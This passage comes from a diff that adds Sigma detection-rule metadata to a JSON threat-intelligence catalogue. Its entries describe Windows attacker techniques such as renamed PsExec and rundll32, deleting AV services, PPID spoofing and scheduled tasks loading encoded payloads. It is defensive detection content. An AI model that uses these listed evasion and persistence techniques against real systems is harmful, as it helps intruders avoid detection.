"1c12727d-02bf-45ff-a9f3-d49806a3cf43", + "value": "Execution Of Renamed Plink Binary", + "meta": { + "refs": [ + "https://thedfirreport.com/2022/06/06/will-the-real-msiexec-please-stand-up-exploit-leads-to-data-exfiltration/", + "https://the.earth.li/~sgtatham/putty/0.58/htmldoc/Chapter7.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_plink.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036" + ], + "creation_date": "2022/06/06", + "filename": "proc_creation_win_renamed_plink.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the execution of a renamed PowerShell often used by attackers or malware", + "uuid": "d178a2d7-129a-4ba4-8ee6-d6e1fecd5d20", + "value": "Renamed PowerShell", + "meta": { + "refs": [ + "https://twitter.com/christophetd/status/1164506034720952320", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_powershell.yml" + ], + "tags": [ + "car.2013-05-009", + "attack.defense_evasion", + "attack.t1036.003" + ], + "creation_date": "2019/08/22", + "filename": "proc_creation_win_renamed_powershell.yml", + "author": "Florian Roth, frack113", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the execution of a renamed ProcDump executable often used by attackers or malware", + "uuid": "4a0b2c7e-7cb2-495d-8b63-5f268e7bfd67", + "value": "Renamed ProcDump", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/sysinternals/downloads/procdump", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_procdump.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036.003" + ], + "creation_date": "2019/11/18", + "filename": "proc_creation_win_renamed_procdump.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Procdump illegaly bundled with legitimate software", + "Weird admins who renamed binaries (and should be investigated)" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the execution of a renamed PsExec often used by attackers or malware", + "uuid": "a7a7e0e5-1d57-49df-9c58-9fe5bc0346a2", + "value": "Renamed PsExec", + "meta": { + "refs": [ + "https://www.trendmicro.com/vinfo/hk-en/security/news/cybercrime-and-digital-threats/megacortex-ransomware-spotted-attacking-enterprise-networks", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_psexec.yml" + ], + "tags": [ + "car.2013-05-009", + "attack.defense_evasion", + "attack.t1036.003" + ], + "creation_date": "2019/05/21", + "filename": "proc_creation_win_renamed_psexec.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Software that illegaly integrates PsExec in a renamed form", + "Administrators that have renamed PsExec and no one knows why" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the execution of rundll32.exe that has been renamed to a different name to avoid detection", + "uuid": "d4d2574f-ac17-4d9e-b986-aeeae0dc8fe2", + "value": "Renamed Rundll32.exe Execution", + "meta": { + "refs": [ + "https://threatresearch.ext.hp.com/svcready-a-new-loader-reveals-itself/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_rundll32.yml" + ], + "tags": "No established tags", + "creation_date": "2022/06/08", + "filename": "proc_creation_win_renamed_rundll32.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects when 'DllRegisterServer' is called in the commandline and the image is not rundll32. This could mean that the 'rundll32' utility has been renamed in order to avoid detection", + "uuid": "2569ed8c-1147-498a-9b8c-2ad3656b10ed", + "value": "DllRegisterServer Call From Non Rundll32", + "meta": { + "refs": [ + "https://twitter.com/swisscom_csirt/status/1331634525722521602?s=20", + "https://app.any.run/tasks/f74c5157-8508-4ac6-9805-d63fe7b0d399/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_rundll32_dllregisterserver.yml" + ], + "tags": [ + "attack.execution" + ], + "creation_date": "2022/08/22", + "filename": "proc_creation_win_renamed_rundll32_dllregisterserver.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects execution of renamed Remote Utilities (RURAT) via Product PE header field", + "uuid": "9ef27c24-4903-4192-881a-3adde7ff92a5", + "value": "Execution of Renamed Remote Utilities RAT (RURAT)", + "meta": { + "refs": [ + "https://redcanary.com/blog/misbehaving-rats/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_rurat.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.collection", + "attack.command_and_control", + "attack.discovery", + "attack.s0592" + ], + "creation_date": "2022/09/19", + "filename": "proc_creation_win_renamed_rurat.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of a renamed SysInternals Sdelete, which is something an administrator shouldn't do (the renaming)", + "uuid": "c1d867fe-8d95-4487-aab4-e53f2d339f90", + "value": "Renamed Sysinternals Sdelete Usage", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/sysinternals/downloads/sdelete", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_sdelete.yml" + ], + "tags": [ + "attack.impact", + "attack.t1485" + ], + "creation_date": "2022/09/06", + "filename": "proc_creation_win_renamed_sdelete.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "System administrator usage" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects renamed vmnat.exe or portable version that can be used for DLL side-loading", + "uuid": "7b4f794b-590a-4ad4-ba18-7964a2832205", + "value": "Renamed or Portable Vmnat.exe", + "meta": { + "refs": [ + "https://twitter.com/malmoeb/status/1525901219247845376", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_vmnat.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.002" + ], + "creation_date": "2022/09/09", + "filename": "proc_creation_win_renamed_vmnat.yml", + "author": "elhoim", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the execution of whoami that has been renamed to a different name to avoid detection", + "uuid": "f1086bf7-a0c4-4a37-9102-01e573caf4a0", + "value": "Renamed Whoami Execution", + "meta": { + "refs": [ + "https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/", + "https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_whoami.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1033", + "car.2016-03-001" + ], + "creation_date": "2021/08/12", + "filename": "proc_creation_win_renamed_whoami.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.", + "uuid": "46591fae-7a4c-46ea-aec3-dff5e6d785dc", + "value": "Root Certificate Installed", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_root_certificate_installed.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1553.004" + ], + "creation_date": "2020/10/10", + "filename": "proc_creation_win_root_certificate_installed.yml", + "author": "oscd.community, @redcanary, Zach Stanford @svch0st", + "level": "medium", + "falsepositive": [ + "Help Desk or IT may need to manually add a corporate Root CA on occasion. Need to test if GPO push doesn't trigger FP" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious remote procedure call (RPC) service anomalies based on the spawned sub processes (long shot to detect the exploitation of vulnerabilities like CVE-2022-26809)", + "uuid": "a7cd7306-df8b-4398-b711-6f3e4935cf16", + "value": "Remote Procedure Call Service Anomaly", + "meta": { + "refs": [ + "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26809", + "https://www.bleepingcomputer.com/startups/RpcSs.exe-14544.html", + "https://twitter.com/cyb3rops/status/1514217991034097664", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rpcss_anomalies.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190", + "attack.execution", + "attack.t1569.002" + ], + "creation_date": "2022/04/13", + "filename": "proc_creation_win_rpcss_anomalies.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown", + "Some cases in which the service spawned a werfault.exe process" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious start of rundll32.exe with a parent process of Explorer.exe. Variant of Raspberry Robin, as first reported by Red Canary.", + "uuid": "1723e720-616d-4ddc-ab02-f7e3685a4713", + "value": "Rundll32 With Suspicious Parent Process", + "meta": { + "refs": [ + "https://redcanary.com/blog/raspberry-robin/", + "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_parent_explorer.yml" + ], + "tags": [ + "attack.defense_evasion" + ], + "creation_date": "2022/05/21", + "filename": "proc_creation_win_rundll32_parent_explorer.yml", + "author": "CD_ROM_", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "load malicious registered COM objects", + "uuid": "f1edd233-30b5-4823-9e6a-c4171b24d316", + "value": "Rundll32 Registered COM Objects", + "meta": { + "refs": [ + "https://nasbench.medium.com/a-deep-dive-into-rundll32-exe-642344b41e90", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.015/T1546.015.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_registered_com_objects.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.persistence", + "attack.t1546.015" + ], + "creation_date": "2022/02/13", + "filename": "proc_creation_win_rundll32_registered_com_objects.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Legitimate use" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects rundll32 execution where the DLL is located on a remote location (share)", + "uuid": "5cdb711b-5740-4fb2-ba88-f7945027afac", + "value": "Rundll32 UNC Path Execution", + "meta": { + "refs": [ + "https://www.cybereason.com/blog/rundll32-the-infamous-proxy-for-executing-malicious-code", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_unc_path.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1021.002", + "attack.t1218.011" + ], + "creation_date": "2022/08/10", + "filename": "proc_creation_win_rundll32_unc_path.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects rundll32 execution without parameters as observed when running Metasploit windows/smb/psexec exploit module", + "uuid": "5bb68627-3198-40ca-b458-49f973db8752", + "value": "Rundll32 Without Parameters", + "meta": { + "refs": [ + "https://bczyz1.github.io/2021/01/30/psexec.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_without_parameters.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1570", + "attack.execution", + "attack.t1569.002" + ], + "creation_date": "2021/01/31", + "filename": "proc_creation_win_rundll32_without_parameters.yml", + "author": "Bartlomiej Czyz, Relativity", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the execution of rundll32 with a command line that doesn't contain a .dll file", + "uuid": "c3a99af4-35a9-4668-879e-c09aeb4f2bdf", + "value": "Rundll32 Execution Without DLL File", + "meta": { + "refs": [ + "https://twitter.com/mrd0x/status/1481630810495139841?s=12", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_run_executable_invalid_extension.yml" + ], + "tags": "No established tags", + "creation_date": "2022/01/13", + "filename": "proc_creation_win_run_executable_invalid_extension.yml", + "author": "Tim Shelton, Florian Roth, Yassine Oukessou (fix + fp)", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Payloads may be compressed, archived, or encrypted in order to avoid detection", + "uuid": "1a70042a-6622-4a2b-8958-267625349abf", + "value": "Run from a Zip File", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md#atomic-test-4---execution-from-compressed-file", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_run_from_zip.yml" + ], + "tags": [ + "attack.impact", + "attack.t1485" + ], + "creation_date": "2021/12/26", + "filename": "proc_creation_win_run_from_zip.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects PowerShell script execution from Alternate Data Stream (ADS)", + "uuid": "45a594aa-1fbd-4972-a809-ff5a99dd81b8", + "value": "Run PowerShell Script from ADS", + "meta": { + "refs": [ + "https://github.com/p0shkatz/Get-ADS/blob/1c3a3562e713c254edce1995a7d9879c687c7473/Get-ADS.ps1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_run_powershell_script_from_ads.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.004" + ], + "creation_date": "2019/10/30", + "filename": "proc_creation_win_run_powershell_script_from_ads.yml", + "author": "Sergey Soldatov, Kaspersky Lab, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects PowerShell script execution via input stream redirect", + "uuid": "c83bf4b5-cdf0-437c-90fa-43d734f7c476", + "value": "Run PowerShell Script from Redirected Input Stream", + "meta": { + "refs": [ + "https://github.com/LOLBAS-Project/LOLBAS/blob/4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834/yml/LOLUtilz/OSBinaries/Powershell.yml", + "https://twitter.com/Moriarty_Meng/status/984380793383370752", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_run_powershell_script_from_input_stream.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1059" + ], + "creation_date": "2020/10/17", + "filename": "proc_creation_win_run_powershell_script_from_input_stream.yml", + "author": "Moriarty Meng (idea), Anton Kutepov (rule), oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries can carry out malicious operations using a virtual instance to avoid detection. This rule is built to detect the registration of the Virtualbox driver or start of a Virtualbox VM.", + "uuid": "bab049ca-7471-4828-9024-38279a4c04da", + "value": "Detect Virtualbox Driver Installation OR Starting Of VMs", + "meta": { + "refs": [ + "https://attack.mitre.org/techniques/T1564/006/", + "https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/", + "https://threatpost.com/maze-ransomware-ragnar-locker-virtual-machine/159350/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_run_virtualbox.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.006", + "attack.t1564" + ], + "creation_date": "2020/09/26", + "filename": "proc_creation_win_run_virtualbox.yml", + "author": "Janantha Marasinghe", + "level": "low", + "falsepositive": [ + "This may have false positives on hosts where Virtualbox is legitimately being used for operations" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the creation of a schtask that executes a file from C:\\Users\\\\AppData\\Local", + "uuid": "c5c00f49-b3f9-45a6-997e-cfdecc6e1967", + "value": "Suspicious Schtasks Execution AppData Folder", + "meta": { + "refs": [ + "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_appdata_local_system.yml" + ], + "tags": [ + "attack.execution", + "attack.persistence", + "attack.t1053.005", + "attack.t1059.001" + ], + "creation_date": "2022/03/15", + "filename": "proc_creation_win_schtasks_appdata_local_system.yml", + "author": "pH-T, Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects scheduled task creation events that include suspicious actions, and is run once at 00:00", + "uuid": "970823b7-273b-460a-8afc-3a6811998529", + "value": "Uncommon Scheduled Task Once 00:00", + "meta": { + "refs": [ + "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbyte", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_once_0000.yml" + ], + "tags": "No established tags", + "creation_date": "2022/07/15", + "filename": "proc_creation_win_schtasks_once_0000.yml", + "author": "pH-T", + "level": "high", + "falsepositive": [ + "Software installation" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious powershell execution that ends with a common flag instead of a command or a filename to execute (could be a sign of implicit execution that uses files in WindowsApps directory)", + "uuid": "b66474aa-bd92-4333-a16c-298155b120df", + "value": "Suspicious Powershell No File or Command", + "meta": { + "refs": [ + "https://blog.malwarebytes.com/threat-intelligence/2022/04/colibri-loader-combines-task-scheduler-and-powershell-in-clever-persistence-technique/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_powershell_windowsapps_execution.yml" + ], + "tags": [ + "attack.execution", + "attack.persistence", + "attack.t1053.005", + "attack.t1059.001" + ], + "creation_date": "2022/04/08", + "filename": "proc_creation_win_schtasks_powershell_windowsapps_execution.yml", + "author": "pH-T, Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the creation of a schtask that executes a base64 encoded payload stored in the Windows Registry using PowerShell.", + "uuid": "c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78", + "value": "Scheduled Task Executing Powershell Encoded Payload from Registry", + "meta": { + "refs": [ + "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_reg_loader.yml" + ], + "tags": [ + "attack.execution", + "attack.persistence", + "attack.t1053.005", + "attack.t1059.001" + ], + "creation_date": "2022/02/12", + "filename": "proc_creation_win_schtasks_reg_loader.yml", + "author": "@Kostastsale, @TheDFIRReport, slightly modified by pH-T", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the creation or update of a scheduled task to run with \"NT AUTHORITY\\SYSTEM\" privileges", + "uuid": "89ca78fd-b37c-4310-b3d3-81a023f83936", + "value": "Schtasks Creation Or Modification With SYSTEM Privileges", + "meta": { + "refs": [ + "https://www.elastic.co/security-labs/exploring-the-qbot-attack-pattern", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_system.yml" + ], + "tags": [ + "attack.execution", + "attack.persistence", + "attack.t1053.005" + ], + "creation_date": "2022/07/28", + "filename": "proc_creation_win_schtasks_system.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", + "uuid": "57bff678-25d1-4d6c-8211-8ca106d12053", + "value": "Use of ScreenConnect Remote Access Software", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-5---screenconnect-application-download-and-install-on-windows", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_screenconnect.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ], + "creation_date": "2022/02/13", + "filename": "proc_creation_win_screenconnect.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate usage of the tool" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious sub processes started by the ScreenConnect client service, which indicates the use of the so-called Backstage mode", + "uuid": "7b582f1a-b318-4c6a-bf4e-66fe49bf55a5", + "value": "ScreenConnect Backstage Mode Anomaly", + "meta": { + "refs": [ + "https://www.mandiant.com/resources/telegram-malware-iranian-espionage", + "https://docs.connectwise.com/ConnectWise_Control_Documentation/Get_started/Host_client/View_menu/Backstage_mode", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_screenconnect_anomaly.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ], + "creation_date": "2022/02/25", + "filename": "proc_creation_win_screenconnect_anomaly.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Case in which administrators are allowed to use ScreenConnect's Backstage mode" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a suspicious child process of Script Event Consumer (scrcons.exe).", + "uuid": "f6d1dd2f-b8ce-40ca-bc23-062efb686b34", + "value": "Script Event Consumer Spawning Process", + "meta": { + "refs": [ + "https://redcanary.com/blog/child-processes/", + "https://docs.paloaltonetworks.com/cortex/cortex-xdr/cortex-xdr-analytics-alert-reference/cortex-xdr-analytics-alert-reference/scrcons-exe-rare-child-process.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_script_event_consumer_spawn.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047" + ], + "creation_date": "2021/06/21", + "filename": "proc_creation_win_script_event_consumer_spawn.yml", + "author": "Sittikorn S", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects when attackers use \"sc.exe\" to delete AV services from the system in order to avoid detection", + "uuid": "7fd4bb39-12d0-45ab-bb36-cebabc73dc7b", + "value": "Suspicious Execution of Sc to Delete AV Services", + "meta": { + "refs": [ + "https://www.virustotal.com/gui/file/38283b775552da8981452941ea74191aa0d203edd3f61fb2dee7b0aea3514955", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sc_delete_av_services.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.t1562.001" + ], + "creation_date": "2022/08/01", + "filename": "proc_creation_win_sc_delete_av_services.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Legitimate software deleting using the same method of deletion (Add it to a filter if you find cases as such)" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects execution of \"sc.exe\" to query information about registered services on the system", + "uuid": "57712d7a-679c-4a41-a913-87e7175ae429", + "value": "SC.EXE Query Execution", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1007/T1007.md#atomic-test-1---system-service-discovery", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sc_query.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1007" + ], + "creation_date": "2021/12/06", + "filename": "proc_creation_win_sc_query.yml", + "author": "frack113", + "level": "low", + "falsepositive": [ + "Legitimate query of a service by an administrator to get more information such as the state or PID" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects installation of a new shim using sdbinst.exe. A shim can be used to load malicious DLLs into applications.", + "uuid": "517490a7-115a-48c6-8862-1a481504d5a8", + "value": "Possible Shim Database Persistence via sdbinst.exe", + "meta": { + "refs": [ + "https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sdbinst_shim_persistence.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1546.011" + ], + "creation_date": "2019/01/16", + "filename": "proc_creation_win_sdbinst_shim_persistence.yml", + "author": "Markus Neis", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "A General detection for sdclt spawning new processes. This could be an indicator of sdclt being used for bypass UAC techniques.", + "uuid": "da2738f2-fadb-4394-afa7-0a0674885afa", + "value": "Sdclt Child Processes", + "meta": { + "refs": [ + "https://github.com/OTRF/detection-hackathon-apt29/issues/6", + "https://threathunterplaybook.com/evals/apt29/detections/3.B.2_C36B49B5-DF58-4A34-9FE9-56189B9DEFEA.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sdclt_child_process.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1548.002" + ], + "creation_date": "2020/05/02", + "filename": "proc_creation_win_sdclt_child_process.yml", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of SDelete to erase a file not the free space", + "uuid": "a4824fca-976f-4964-b334-0621379e84c4", + "value": "Sysinternals SDelete Delete File", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sdelete.yml" + ], + "tags": [ + "attack.impact", + "attack.t1485" + ], + "creation_date": "2021/06/03", + "filename": "proc_creation_win_sdelete.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "System administrator usage" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects sdiagnhost.exe calling a suspicious child process (e.g. used in exploits for Follina / CVE-2022-30190)", + "uuid": "f3d39c45-de1a-4486-a687-ab126124f744", + "value": "Sdiagnhost Calling Suspicious Child Process", + "meta": { + "refs": [ + "https://twitter.com/nao_sec/status/1530196847679401984", + "https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/", + "https://app.any.run/tasks/f420d295-0457-4e9b-9b9e-6732be227583/", + "https://app.any.run/tasks/c4117d9a-f463-461a-b90f-4cd258746798/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sdiagnhost_susp_child.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036", + "attack.t1218" + ], + "creation_date": "2022/06/01", + "filename": "proc_creation_win_sdiagnhost_susp_child.yml", + "author": "Nextron Systems", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of parent process ID spoofing tools like Didier Stevens tool SelectMyParent", + "uuid": "52ff7941-8211-46f9-84f8-9903efb7077d", + "value": "PPID Spoofing Tool Usage", + "meta": { + "refs": [ + "https://pentestlab.blog/2020/02/24/parent-pid-spoofing/", + "https://www.picussecurity.com/resource/blog/how-to-detect-parent-pid-ppid-spoofing-attacks", + "https://www.ired.team/offensive-security/defense-evasion/parent-process-id-ppid-spoofing", + "https://www.virustotal.com/gui/search/filename%253A*spoof*%2520filename%253A*ppid*/files", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_selectmyparent.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1134.004" + ], + "creation_date": "2022/07/23", + "filename": "proc_creation_win_selectmyparent.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects manual service execution (start) via system utilities.", + "uuid": "2a072a96-a086-49fa-bcb5-15cc5a619093", + "value": "Service Execution", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1569.002/T1569.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_service_execution.yml" + ], + "tags": [ + "attack.execution", + "attack.t1569.002" + ], + "creation_date": "2019/10/21", + "filename": "proc_creation_win_service_execution.yml", + "author": "Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community", + "level": "low", + "falsepositive": [ + "Legitimate administrator or user executes a service for legitimate 